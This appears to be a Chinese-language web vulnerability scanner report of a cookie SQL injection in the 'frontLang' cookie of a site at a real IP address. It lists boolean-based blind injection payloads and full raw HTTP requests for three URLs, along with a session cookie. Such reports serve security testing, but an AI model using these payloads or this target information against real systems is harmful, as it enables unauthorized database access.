检测到目标URL存在COOKIE注入漏洞
URL http://202.201.39.48/index.php/tw/
请求方式 GET
问题参数 frontLang
判断标准 1、根据原始请求,修改cookie值,分别构造伪请求和错误请求,并依次发送伪请求和错误请求;
2、如果原始请求的响应内容和伪请求的响应内容非常相似,且原始请求的响应内容和错误请求的响应内容差异很大,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/tw/ ,设置参数 frontLangzh-cn%25%27%20Or%201049=1050%20AnD%20%27%25%27=%27%25%27%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比;
2、构造URL: http://202.201.39.48/index.php/tw/ ,设置参数 frontLangzh-cn%25%27%20Or%201049=1049%20AnD%20%27%25%27=%27%25%27%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比。
请求&响应
GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn%' Or 1049=1050 AnD '%'='%' --
  • Referer: http://202.201.39.48/

GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn%' Or 1049=1049 AnD '%'='%' --
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/en/.git/index
请求方式 GET
问题参数 frontLang
判断标准 1、根据原始请求,修改cookie值,分别构造伪请求和错误请求,并依次发送伪请求和错误请求;
2、如果原始请求的响应内容和伪请求的响应内容非常相似,且原始请求的响应内容和错误请求的响应内容差异很大,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/en/.git/index ,设置参数 frontLangzh-cn%27%20AnD%201227=1227%20AnD%20%271227%27=%271227%27%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比;
2、构造URL: http://202.201.39.48/index.php/en/.git/index ,设置参数 frontLangzh-cn%27%20AnD%201227=1227%20AnD%20%271227%27=%271228%27%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比。
请求&响应
GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/en/

GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn' AnD 1227=1227 AnD '1227'='1227' --
  • Referer: http://202.201.39.48/index.php/en/

GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/en/

GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn' AnD 1227=1227 AnD '1227'='1228' --
  • Referer: http://202.201.39.48/index.php/en/

URL http://202.201.39.48/index.php/tw/index.asp
请求方式 GET
问题参数 frontLang
判断标准 1、根据原始请求,修改cookie值,分别构造伪请求和错误请求,并依次发送伪请求和错误请求;
2、如果原始请求的响应内容和伪请求的响应内容非常相似,且原始请求的响应内容和错误请求的响应内容差异很大,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/tw/index.asp ,设置参数 frontLangzh-cn)%20AnD%201131=1131%20Or%20(1131=1132)%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比;
2、构造URL: http://202.201.39.48/index.php/tw/index.asp ,设置参数 frontLangzh-cn)%20AnD%201131=1131%20Or%20(1131=1131)%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比。
请求&响应
GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/tw/

GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn) AnD 1131=1131 Or (1131=1132) --
  • Referer: http://202.201.39.48/index.php/tw/

GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/tw/

GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn) AnD 1131=1131 Or (1131=1131) --
  • Referer: http://202.201.39.48/index.php/tw/